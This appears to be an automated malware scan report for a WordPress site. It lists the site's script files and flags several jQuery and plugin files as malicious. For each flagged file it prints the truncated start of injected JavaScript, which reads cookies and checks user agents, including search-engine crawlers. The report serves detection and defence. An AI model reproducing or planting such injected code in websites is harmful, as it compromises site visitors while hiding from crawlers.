Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=promunoty.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.promunoty.com/ | 200 OK Content-Length: 40327 Content-Type: text/html | clean |
http://www.promunoty.com/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 94141 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t jQuery.noConflict(); Antivirus reports:
| ||
http://www.promunoty.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8256 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t Antivirus reports:
| ||
http://www.promunoty.com/wp-content/themes/graphene/js/jquery.infinitescroll.min.js?ver=3.8.4 | 200 OK Content-Length: 12198 Content-Type: application/javascript | clean |
http://www.promunoty.com/wp-content/themes/graphene/js/graphene.js?ver=3.8.4 | 200 OK Content-Length: 9502 Content-Type: application/javascript | clean |
http://www.promunoty.com/wp-content/plugins/user-access-manager/js/jquery.tools.min.js?ver=3.8.4 | 200 OK Content-Length: 6780 Content-Type: application/javascript | clean |
http://www.promunoty.com/wp-content/plugins/user-access-manager/js/functions.js?ver=3.8.4 | 200 OK Content-Length: 2126 Content-Type: application/javascript | clean |
http://earthship.api.oneall.com/socialize/library.js | 200 OK Content-Length: 41212 Content-Type: text/javascript | suspicious |
Page code contains blacklisted domain: www.promunoty.com ...[573 bytes skipped]... n d}}(g,c[g]):c[g]);d.prototype=f;d.prototype.constructor= d;d.extend=arguments.callee;return d}})();Array.prototype.indexOf||(Array.prototype.indexOf=function(a){var b;for(b=0;b<this.length;b+=1)if(this[b]===a)return b;return-1});var oneall={cfg:{base_domain:null,is_valid_base_domain:!1,included_files:[],can_trigger_cancel:!1}};oneall.cfg.app={protocol:"http",language:"fr",domain:"earthship.api.oneall.com",whitelisted_domains:["www.promunoty.com", "promunoty.com", "*.promunoty.com"],is_suspended:!1,has_plan_ajs:!0,has_plan_sso:!0}; oneall.cfg.get_uri=function(a){var b=this.app.protocol+"://"+this.app.domain;switch(a){case "provider_connect":return b+"/socialize/connect.html";case "provider_connect_raw":return b+"/socialize/connect/raw/";case "provider_login_data_frame":return b+"/socialize/login/data/frame/";case "provider_login_frame":return b+"/socialize/login/frame/";case "provider_login_modal":return b+"/social ...[2613 bytes skipped]... | ||
http://www.promunoty.com/wp-includes/js/jquery/ui/jquery.ui.effect.min.js?ver=1.10.3 | 200 OK Content-Length: 14028 Content-Type: application/javascript | clean |
http://www.promunoty.com/wp-includes/js/jquery/ui/jquery.ui.effect-blind.min.js?ver=1.10.3 | 200 OK Content-Length: 2011 Content-Type: application/javascript | clean |
http://www.promunoty.com/wp-content/plugins/wp-special-textboxes/js/wstb.min.js?ver=4.4.75 | 200 OK Content-Length: 2794 Content-Type: application/javascript | clean |
http://www.promunoty.com/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery.validationEngine-fr.js?ver=2.6.6 | 200 OK Content-Length: 8903 Content-Type: application/javascript | clean |
http://www.promunoty.com/wp-content/plugins/wysija-newsletters/js/validate/jquery.validationEngine.js?ver=2.6.6 | 200 OK Content-Length: 72801 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t fadeDuration: 0.3, // Use Prettify select library prettySelect: false, // Add css class on prompt addPromptClass : "", // Custom ID uses prefix usePrefix: "", // Custom ID uses suffix useSuffix: "", // Only show one message per error prompt showOneMessage: false }}; $(function(){$.validationEngine.defaults.promptPosition = methods.isRTL()?'topLeft':"topRight"}); })(jQuery); Antivirus reports:
| ||
http://www.promunoty.com/wp-content/plugins/wysija-newsletters/js/front-subscribers.js?ver=2.6.6 | 200 OK Content-Length: 4227 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t Antivirus reports:
| ||
http://www.promunoty.com/feed/ | 200 OK Content-Length: 68177 Content-Type: text/xml | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: promunoty.com
Result:
GET / HTTP/1.1
Host: promunoty.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: promunoty.com
Referer: http://www.google.com/search?q=promunoty.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: promunoty.com
Referer: http://www.google.com/search?q=promunoty.com
Result:
The result is similar to the first query. There are no suspicious redirects found.